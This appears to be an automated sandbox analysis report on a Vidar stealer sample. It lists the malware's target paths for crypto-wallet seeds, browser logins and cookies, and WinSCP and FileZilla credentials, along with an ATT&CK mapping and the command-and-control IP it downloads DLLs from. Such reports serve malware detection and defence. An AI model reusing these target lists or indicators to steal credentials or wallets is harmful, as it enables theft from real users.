Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7408, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.a00018.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.a00018.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7408, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19D4D9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	2_2_19D4D9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19CC5910 sqlite3_mprintf,sqlite3_bind_int64,	2_2_19CC5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C9DB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	2_2_19C9DB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C35C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	2_2_19C35C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C9DFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,	2_2_19C9DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19CA1FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_19CA1FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19CC51D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_19CC51D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19CB9090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,	2_2_19CB9090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19CDD3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_19CDD3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19CC55B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_19CC55B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19D414D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	2_2_19D414D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19D4D4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,	2_2_19D4D4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19CFD610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_19CFD610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C34820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,	2_2_19C34820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19D04D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,InitOnceBeginInitialize,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	2_2_19D04D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C50FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	2_2_19C50FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C98200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,	2_2_19C98200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C78550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,	2_2_19C78550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C706E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,	2_2_19C706E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C48680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,	2_2_19C48680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C4B400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,	2_2_19C4B400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19D037E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_19D037E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19CE3770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_19CE3770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C7EF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,	2_2_19C7EF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C9E170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_19C9E170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C8E090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	2_2_19C8E090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C8E200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,	2_2_19C8E200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C366C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	2_2_19C366C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C9A6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,	2_2_19C9A6F0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	411 Process Injection	1 Masquerading	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	411 Process Injection	1 Credentials in Registry	141 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	12 Process Discovery	SMB/Windows Admin Shares	4 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	4 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	54 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\ProgramData\HDGCFHIDAKEC\freebl3.dll	0%	ReversingLabs
C:\ProgramData\HDGCFHIDAKEC\freebl3.dll	0%	Virustotal	Browse
C:\ProgramData\HDGCFHIDAKEC\mozglue.dll	0%	ReversingLabs
C:\ProgramData\HDGCFHIDAKEC\mozglue.dll	0%	Virustotal	Browse
C:\ProgramData\HDGCFHIDAKEC\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\HDGCFHIDAKEC\msvcp140.dll	0%	Virustotal	Browse
C:\ProgramData\HDGCFHIDAKEC\nss3.dll	0%	ReversingLabs
C:\ProgramData\HDGCFHIDAKEC\nss3.dll	0%	Virustotal	Browse
C:\ProgramData\HDGCFHIDAKEC\softokn3.dll	0%	ReversingLabs
C:\ProgramData\HDGCFHIDAKEC\softokn3.dll	0%	Virustotal	Browse
C:\ProgramData\HDGCFHIDAKEC\vcruntime140.dll	0%	ReversingLabs
C:\ProgramData\HDGCFHIDAKEC\vcruntime140.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	1%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	0%	Virustotal	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://mozilla.org0/	0%	URL Reputation	safe
https://recaptcha.net	0%	URL Reputation	safe
https://s.ytimg.com;	0%	Avira URL Cloud	safe
https://95.217.246.168	0%	Avira URL Cloud	safe
https://www.gstatic.cn/recaptcha/	0%	Avira URL Cloud	safe
https://95.217.246.168/6.	0%	Avira URL Cloud	safe
https://95.217.246.168/vcruntime140.dll	0%	Avira URL Cloud	safe
https://95.217.246.168/	0%	Avira URL Cloud	safe
https://95.217.246.168/msvcp140.dllR	0%	Avira URL Cloud	safe
https://95.217.246.168/sqln.dlluZqb.	0%	Avira URL Cloud	safe
https://95.217.246.168/nss3.dll	0%	Avira URL Cloud	safe
https://95.217.246.168	0%	Virustotal		Browse
https://95.217.246.168KJE	0%	Avira URL Cloud	safe
https://95.217.246.168/msvcp140.dll(	0%	Avira URL Cloud	safe
https://95.217.246.168/msvcp140.dll	0%	Avira URL Cloud	safe
https://95.217.246.168/	0%	Virustotal		Browse
https://95.217.246.168/vcruntime140.dllF	0%	Avira URL Cloud	safe
https://95.217.246.168/softokn3.dll	0%	Avira URL Cloud	safe
https://www.gstatic.cn/recaptcha/	0%	Virustotal		Browse
https://95.217.246.168FIE	0%	Avira URL Cloud	safe
https://95.217.246.168/mozglue.dll	0%	Avira URL Cloud	safe
https://95.217.246.168/freebl3.dll	0%	Avira URL Cloud	safe
https://95.217.246.168/sqln.dll	0%	Avira URL Cloud	safe
https://95.217.246.168/sqln.dll	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
steamcommunity.com	23.194.234.100	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://95.217.246.168/vcruntime140.dll	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199677575543	false		high
https://95.217.246.168/nss3.dll	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/msvcp140.dll	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/softokn3.dll	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/mozglue.dll	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/freebl3.dll	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/sqln.dll	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	BFIDGHDB.2.dr	false		high
https://duckduckgo.com/ac/?q=	BFIDGHDB.2.dr	false		high
https://steamcommunity.com/?subsection=broadcasts	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://steamcommunity.com/profiles/76561199677575543/badges	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://95.217.246.168	76561199677575543[1].htm.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6jg&a	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
